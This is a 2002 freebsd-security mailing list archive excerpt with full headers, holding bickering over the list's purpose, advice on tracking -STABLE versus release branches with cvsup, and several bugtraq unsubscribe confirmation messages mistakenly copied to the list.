Received: from mail.korg.co.jp (mail.korg.co.jp [203.141.175.50]) by scfep02.kcom.ne.jp (8.11.3/3.7W-i020702) with ESMTP id g624RVJ18252; Tue, 2 Jul 2002 13:27:31 +0900 (JST) Received: from deBroglie ([192.168.221.129]) by mail.korg.co.jp (8.10.2/8.10.2) with ESMTP id g624RVV25172 for ; Tue, 2 Jul 2002 13:27:31 +0900 To: freebsd-security@FreeBSD.ORG From: OHMORI HIDEKI Message-Id: <200207021329.BGD13092.SPIJNP@korg.co.jp> X-Mailer: Winbiff [Version 2.34PL1] X-Accept-Language: ja,en Date: Tue, 2 Jul 2002 13:29:12 +0900 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org auth 0a901458 subscribe freebsd-security ohmori@korg.co.jp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 21:59:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 01B9C37B400 for ; Mon, 1 Jul 2002 21:59:15 -0700 (PDT) Received: from pimout5-int.prodigy.net (pimout5-ext.prodigy.net [207.115.63.98]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3FFEF43E13 for ; Mon, 1 Jul 2002 21:59:14 -0700 (PDT) (envelope-from michael@ursine.com) Received: from mbryan (adsl-66-122-17-70.dsl.scrm01.pacbell.net [66.122.17.70]) by pimout5-int.prodigy.net (8.11.0/8.11.0) with ESMTP id g624xCK137868; Tue, 2 Jul 2002 00:59:13 -0400 Message-ID: <200207012159020190.0FA21A9E@smtp.sbcglobal.net> In-Reply-To: <4.3.2.7.2.20020701210911.022a3650@localhost> References: <4.3.2.7.2.20020701210911.022a3650@localhost> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Mon, 01 Jul 2002 21:59:02 -0700 From: "Michael Bryan" To: freebsd-security@FreeBSD.ORG Cc: brett@lariat.org Subject: Re: Low-volume list Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 7/1/02 at 9:11 PM Brett Glass wrote: >This isn't the first time that people have asked for a low-volume FreeBSD >security list with announcements only. But discussions of security are >important, too, and there should be a place for them! So, perhaps this >list should be split into two: "security-announce" (moderated) and >"security" (unmoderated). Yeah, you're right! Too bad the FreeBSD team never thought of that!!! Oh wait, they did, years ago, explaining why one of my mail folders contains -only- FreeBSD security announcements: http://www.freebsd.org/security/security.html#ml Sheesh. RTFM. (RTFWP?) -- Michael Bryan michael@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 22:44:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2EBA937B400 for ; Mon, 1 Jul 2002 22:44:21 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id E9BE743E0A for ; Mon, 1 Jul 2002 22:44:20 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 9155E8B5CE; Mon, 1 Jul 2002 22:44:20 -0700 (PDT) Message-ID: <3D213DB4.29DB6745@FreeBSD.org> Date: Mon, 01 Jul 2002 22:44:20 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The thing that people are actually asking for is a better signal to noise ratio. Thus, my consistent requests for people to stay on topic. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:15:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ABAA837B400 for ; Tue, 2 Jul 2002 01:15:31 -0700 (PDT) Received: from plamen.bgstore.com (bgstore.digsys.bg [193.68.22.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 23FE643E0A for ; Tue, 2 Jul 2002 01:15:28 -0700 (PDT) (envelope-from plamendp@bgstore.com) Received: from ilkom1 ([217.79.73.98]) by plamen.bgstore.com (8.12.5/8.12.5) with SMTP id g628HBeW054927; Tue, 2 Jul 2002 11:17:27 +0300 (EEST) (envelope-from plamendp@bgstore.com) Message-ID: <007b01c221a8$e9a19ba0$62494fd9@f2f.cx> From: "Plamen Petkov" To: "Kevin Kinsey, DaleCo, S.P." Cc: References: <20020701141839.V50179-100000@mohegan.mohawk.net> <008401c22136$08d62e00$edec910c@fbccarthage.com> Subject: Re: security fixes Date: Tue, 2 Jul 2002 11:14:30 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Since 2-3 years I don't have any problems cvsuping only *-STABLE. It's a matter of trust in core team, all commiters, etc. that -STABLE is *realy* stable :-) So, I always cvsup -STABLE (RELENG_4 at the moment) and everything is OK. Of course, I first cvsup at dev machine and test if it's Ok then cvsup on production machine(s). Just to be sure there is nothing wrong with cvsup server I use. Regards, --- Plamen D. Petkov, ICQ# 2214327 plamendp@bgstore.com http://www.bgstore.com > > With all the traffic surrounding these recent vulnerabilities, it's a > > little confusing to know what one has to do and need not do. Let me ask > > this one question, please: > > > > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I > > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:16:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 15EC037B400 for ; Tue, 2 Jul 2002 01:16:08 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 07B6F43E0A for ; Tue, 2 Jul 2002 01:16:07 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id CAA15723; Tue, 2 Jul 2002 02:15:49 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020702021318.00d4d740@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 02:15:45 -0600 To: "Michael Bryan" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Low-volume list In-Reply-To: <200207012159020190.0FA21A9E@smtp.sbcglobal.net> References: <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020701210911.022a3650@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:59 PM 7/1/2002, Michael Bryan wrote: >Yeah, you're right! Too bad the FreeBSD team never thought of that!!! > >Oh wait, they did, years ago, explaining why one of my mail folders >contains -only- FreeBSD security announcements: > >http://www.freebsd.org/security/security.html#ml > >Sheesh. RTFM. (RTFWP?) CFTFWP (Couldn't find the fine Web page), I guess. In any event, most people seem to believe that -security is the low volume list. If that's not its charter, then why all the complaints when there is (horrors!) a discussion? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:23:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C866637B405 for ; Tue, 2 Jul 2002 01:23:03 -0700 (PDT) Received: from plamen.bgstore.com (bgstore.digsys.bg [193.68.22.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0D93943E26 for ; Tue, 2 Jul 2002 01:23:01 -0700 (PDT) (envelope-from plamendp@bgstore.com) Received: from ilkom1 ([217.79.73.98]) by plamen.bgstore.com (8.12.5/8.12.5) with SMTP id g628PDeW055142 for ; Tue, 2 Jul 2002 11:25:14 +0300 (EEST) (envelope-from plamendp@bgstore.com) Message-ID: <008701c221a9$ff8cc380$62494fd9@f2f.cx> From: "Plamen Petkov" To: References: <20020701153650.Q50179-100000@mohegan.mohawk.net> <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Subject: Re: security fixes Date: Tue, 2 Jul 2002 11:22:32 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would say that -STABLE is just the next mini-RELEASE and is a matter of naming scheme. The -CURRENT is.. well, the danger one, it might be *realy* unstable sometimes. But I think this discussion is enough old. I'd suggest searching mailing lists archives for more info about this subject. Regards, --- Plamen D. Petkov, ICQ# 2214327 plamendp@bgstore.com http://www.bgstore.com > As opposed to -CURRENT, yes. However, > the committers want everyone to realize that > once in a while you might build -STABLE with > something broken (albeit rare, as in the coincidence > of the "blue moon" and "hen's teeth" together...) > but it still could happen. -RELEASE is a -STABLE > that gets frozen for a while to see if any problems > pop up, or if it can be crowed about and burned > to CD with confidence (I hope the RELENG team > doesn't think I'm minimizing their hard work here.) > > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. > The official line is that it's the current release (4.6) > and the last (4.5) that are being patched, so if > you're still running 4.4-R, (for example) you're no > longer sure you can cvsup with RELENG_4_4 > and get any new patches. > > As I said, -STABLE's running fine for me To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:26:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 27D0C37B400 for ; Tue, 2 Jul 2002 01:26:12 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 493A743E09 for ; Tue, 2 Jul 2002 01:26:11 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g628Q0t07603; Tue, 2 Jul 2002 02:26:00 -0600 (MDT) Message-ID: <3D216380.2E145DF3@fpsn.net> Date: Tue, 02 Jul 2002 02:25:36 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020702021318.00d4d740@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What complaints, The only thing I see on here time after time are complaints about the endless stream of bogus posts from you Brett. Stop the madness and simply unsubscribe. Heck why not create your own -security list for the people who so closely follow your posts. Cheers. Brett Glass wrote: > > At 10:59 PM 7/1/2002, Michael Bryan wrote: > > >Yeah, you're right! Too bad the FreeBSD team never thought of that!!! > > > >Oh wait, they did, years ago, explaining why one of my mail folders > >contains -only- FreeBSD security announcements: > > > >http://www.freebsd.org/security/security.html#ml > > > >Sheesh. RTFM. (RTFWP?) > > CFTFWP (Couldn't find the fine Web page), I guess. > > In any event, most people seem to believe that -security is the > low volume list. If that's not its charter, then why all the > complaints when there is (horrors!) a discussion? > > --Brett > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:38:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED25837B401 for ; Tue, 2 Jul 2002 01:38:29 -0700 (PDT) Received: from munkboxen.mine.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 70F8843E13 for ; Tue, 2 Jul 2002 01:38:28 -0700 (PDT) (envelope-from munk@munkboxen.mine.nu) Received: (from munk@localhost) by munkboxen.mine.nu (8.11.6/8.11.6) id g628aFo23305 for freebsd-security@FreeBSD.ORG; Tue, 2 Jul 2002 09:36:15 +0100 (BST) (envelope-from munk) Date: Tue, 2 Jul 2002 09:36:15 +0100 From: Jez Hancock To: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list Message-ID: <20020702093615.A23291@munkboxen.mine.nu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.3.2.7.2.20020701210911.022a3650@localhost> <3D211BAD.70908@porsche.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D211BAD.70908@porsche.de>; from perisa@porsche.de on Tue, Jul 02, 2002 at 05:19:09AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 02, 2002 at 05:19:09AM +0200, Marc Perisa wrote: > Brett Glass wrote: > quoting > http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/eresources.html#ERESOURCES-MAIL >SNIP< > /Security issues/ > > FreeBSD computer security issues (DES, Kerberos, known security > holes and fixes, etc). This is a technical mailing list for which > strictly technical content is expected. ///strictly technical content/// If you read this mail then I guess this list is not moderated, this mail has absolutely nothing to do with technical content... Would it not be acceptable to have a moderator for this list? I'm totally fed up with listening to the whinging and back-biting on this list. Sorry to whinge and back-bite, Jez -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:57:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F28A537B400 for ; Tue, 2 Jul 2002 03:57:49 -0700 (PDT) Received: from socrates.thinkhost.com (socrates.thinkhost.com [209.61.191.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8895443E2F for ; Tue, 2 Jul 2002 03:57:49 -0700 (PDT) (envelope-from davidzon@socrates.thinkhost.com) Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:46 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com> Message-ID: <20020702065745.G80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > freebsd-security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 > Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 > Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 > Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 > Date: 29 Jun 2002 03:40:08 -0000 > Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:58: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8BD9C37B405 for ; Tue, 2 Jul 2002 03:57:55 -0700 (PDT) Received: from socrates.thinkhost.com (socrates.thinkhost.com [209.61.191.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 020BC43E0A for ; Tue, 2 Jul 2002 03:57:55 -0700 (PDT) (envelope-from davidzon@socrates.thinkhost.com) Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:53 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Cc: security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: <20020702065752.U80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:59:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B211E37B400 for ; Tue, 2 Jul 2002 03:59:25 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 9499243E3D for ; Tue, 2 Jul 2002 03:58:52 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 13449 invoked by alias); 2 Jul 2002 10:56:30 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 10:56:30 -0000 Message-ID: <1025607390.13448.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 13442 invoked from network); 2 Jul 2002 10:56:30 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:30 -0000 Received: (qmail 29185 invoked by alias); 2 Jul 2002 10:52:05 -0000 Received: (qmail 29177 invoked from network); 2 Jul 2002 10:52:05 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:52:05 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 13442 invoked from network); 2 Jul 2002 10:56:30 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:30 -0000 Received: (qmail 29185 invoked by alias); 2 Jul 2002 10:52:05 -0000 Received: (qmail 29177 invoked from network); 2 Jul 2002 10:52:05 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:52:05 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:53 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com cc: security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: <20020702065752.U80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative 